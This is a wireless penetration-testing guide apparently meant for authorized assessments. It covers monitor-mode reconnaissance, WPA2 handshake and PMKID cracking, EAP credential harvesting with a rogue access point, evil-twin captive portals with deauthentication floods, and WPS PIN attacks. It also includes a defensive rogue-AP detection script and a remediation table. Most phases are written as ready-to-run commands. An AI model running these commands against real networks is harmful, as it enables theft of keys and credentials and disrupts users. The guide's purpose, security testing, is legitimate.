Performing Wireless Network Penetration Test

Overview

Wireless penetration testing evaluates the security of an organization's WiFi infrastructure, including encryption strength, authentication mechanisms, rogue access point detection, client isolation, and network segmentation. Testing covers 802.11a/b/g/n/ac/ax protocols, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, captive portals, and Bluetooth/BLE where in scope.

When to Use

  • When conducting security assessments that involve performing a wireless network penetration test
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Written authorization specifying wireless scope (SSIDs, BSSIDs, physical locations)
  • Compatible wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036ACH, TP-Link TL-WN722N v1)
  • Kali Linux with Aircrack-ng suite, Bettercap, Wifite, Kismet
  • Physical proximity to target wireless networks
  • GPS receiver for mapping (optional)

Phase 1 — Wireless Reconnaissance

Enable Monitor Mode

```bash
# Check wireless interfaces
iwconfig
airmon-ng

# Kill interfering processes
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0
# Interface becomes wlan0mon

# Verify monitor mode
iwconfig wlan0mon
```

Passive Scanning

```bash
# Discover all networks in range
airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap

# Filter by specific channel
airodump-ng wlan0mon -c 6 -w channel6_scan

# Scan 5GHz band
airodump-ng wlan0mon --band a -w 5ghz_scan

# Scan all bands
airodump-ng wlan0mon --band abg -w full_scan

# Kismet passive scanning (advanced)
kismet -c wlan0mon
```

Network Inventory

| SSID | BSSID | Channel | Encryption | Clients | Signal |
|---|---|---|---|---|---|
| CorpWiFi | AA:BB:CC:DD:EE:01 | 6 | WPA2-Enterprise | 45 | -55 dBm |
| CorpGuest | AA:BB:CC:DD:EE:02 | 11 | WPA2-PSK | 12 | -60 dBm |
| PrinterNet | AA:BB:CC:DD:EE:03 | 1 | WEP | 3 | -70 dBm |
| HiddenSSID | AA:BB:CC:DD:EE:04 | 36 | WPA2-PSK | 8 | -65 dBm |

Phase 2 — WPA2-PSK Attack

Capture 4-Way Handshake

```bash
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon

# Deauthenticate a client to force reconnection (handshake capture)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c FF:FF:FF:FF:FF:FF wlan0mon

# Verify handshake captured
aircrack-ng corpguest-01.cap
# Look for "1 handshake" in output
```

Crack WPA2 Key

```bash
# Dictionary attack with Aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap

# GPU-accelerated cracking with Hashcat
# Convert cap to hashcat 22000 (hc22000) format; hccapx is the older format
hcxpcapngtool -o hash.hc22000 corpguest-01.cap

# Hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# PMKID attack (no client needed)
hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng \
  --filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
```

Phase 3 — WPA2-Enterprise Attack

```bash
# Set up rogue AP with EAP credential harvesting
# Using hostapd-mana
cat > hostapd-mana.conf << 'EOF'
interface=wlan0mon
ssid=CorpWiFi
hw_mode=g
channel=6
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
mana_wpe=1
mana_credout=creds.txt
EOF

# EAP user file
cat > hostapd.eap_user << 'EOF'
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2]
EOF

hostapd-mana hostapd-mana.conf

# Captured MSCHAP challenges can be cracked
# Crack NetNTLMv1 from EAP-MSCHAP
hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
```

Phase 4 — Evil Twin Attack

```bash
# Create evil twin with Bettercap
sudo bettercap -iface wlan0mon
# Within Bettercap:
#   wifi.recon on
#   wifi.ap

# Or manual evil twin with hostapd + dnsmasq
cat > evil_twin.conf << 'EOF'
interface=wlan1
ssid=CorpGuest
hw_mode=g
channel=6
driver=nl80211
auth_algs=1
wpa=0
EOF

# Start captive portal
hostapd evil_twin.conf &
dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h \
  --address=/#/192.168.1.1

# Deauth clients from real AP to force connection to evil twin
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
```

Phase 5 — Additional Tests

Rogue AP Detection

```bash
# Compare authorized AP list against discovered APs
# Authorized BSSIDs from client documentation
# Flag any unknown BSSIDs broadcasting corporate SSIDs

# Check for misconfigured APs
# Personal hotspots bridging to corporate network
# IoT devices with default WiFi settings
```
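A defender-side implementation of the comparison described above, added here as an example and not part of the original page: it parses the access-point table of an airodump-ng CSV (the file written by `-w ... --output-format csv` in Phase 1), flags unknown BSSIDs broadcasting corporate SSIDs, and flags WEP/open APs as misconfigured. The sample CSV, the authorized BSSID list, the corporate SSID list and the rogue BSSID DE:AD:BE:EF:00:01 are all constructed for the example.

```python
import csv
import io

# Constructed sample in airodump-ng CSV layout (not a real capture). BSSIDs
# AA:BB:CC:DD:EE:01-03 and the SSIDs follow the network inventory above;
# DE:AD:BE:EF:00:01 is a made-up rogue AP cloning the corporate SSID.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -55, 120, 0,   0.  0.  0.  0,   8, CorpWiFi, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -60,  98, 0,   0.  0.  0.  0,   9, CorpGuest, 
AA:BB:CC:DD:EE:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP, WEP, , -70,  40, 0,   0.  0.  0.  0,  10, PrinterNet, 
DE:AD:BE:EF:00:01, 2024-01-01 10:02:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -48,  30, 0,   0.  0.  0.  0,   8, CorpWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Assumed inputs: authorized BSSIDs come from the client's AP documentation.
AUTHORIZED_BSSIDS = {"AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02", "AA:BB:CC:DD:EE:03"}
CORPORATE_SSIDS = {"CorpWiFi", "CorpGuest"}
WEAK_PRIVACY = {"OPN", "WEP"}  # airodump-ng Privacy column values to flag


def parse_access_points(csv_text):
    """Return the AP rows of an airodump-ng CSV as dicts; stops at the station table."""
    aps = []
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if not cells or cells[0] in ("", "BSSID"):
            continue  # blank separator line or AP table header
        if cells[0] == "Station MAC":
            break  # client table follows; not needed here
        aps.append({"bssid": cells[0].upper(), "channel": cells[3],
                    "privacy": cells[5], "power": cells[8], "essid": cells[13]})
    return aps


def classify(aps, authorized, corporate_ssids):
    """Flag rogue APs (unknown BSSID using a corporate SSID) and weak encryption."""
    findings = []
    for ap in aps:
        if ap["essid"] in corporate_ssids and ap["bssid"] not in authorized:
            findings.append(("rogue-ap", ap["bssid"], ap["essid"]))
        if ap["privacy"] in WEAK_PRIVACY:
            findings.append(("weak-encryption", ap["bssid"], ap["privacy"]))
    return findings


if __name__ == "__main__":
    for kind, bssid, detail in classify(parse_access_points(SAMPLE_CSV),
                                        AUTHORIZED_BSSIDS, CORPORATE_SSIDS):
        print(f"{kind:16} {bssid}  {detail}")
```

Run it against the real `wireless_scan-01.csv` by reading that file into `parse_access_points` in place of the constructed sample.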

Client Isolation Testing

```bash
# After connecting to guest network:
# Scan for other clients
nmap -sn 192.168.10.0/24

# Attempt to reach corporate resources
nmap -sT -p 80,443,445,3389 10.0.0.0/24

# Test VLAN hopping
# If guest network is not properly segmented from corporate
```

WPS Attack

```bash
# Check for WPS-enabled APs
wash -i wlan0mon

# WPS PIN bruteforce (if WPS enabled and not rate-limited)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -vv

# Pixie-Dust attack (offline WPS PIN recovery)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -K 1 -vv
```

Findings Template

| Finding | Severity | CVSS | Remediation |
|---|---|---|---|
| WPA2-PSK with weak passphrase | High | 8.1 | Use 20+ char passphrase or migrate to WPA2-Enterprise |
| WEP encryption on printer network | Critical | 9.1 | Upgrade to WPA2/WPA3, segment printer VLAN |
| WPS enabled on guest AP | Medium | 5.3 | Disable WPS on all access points |
| No client isolation on guest | High | 7.5 | Enable AP isolation and VLAN segmentation |
| Corporate SSID broadcasts on rogue AP | High | 8.1 | Deploy WIDS/WIPS, implement 802.1X with cert validation |
| EAP-MSCHAP without cert pinning | High | 7.5 | Enforce server certificate validation on all clients |
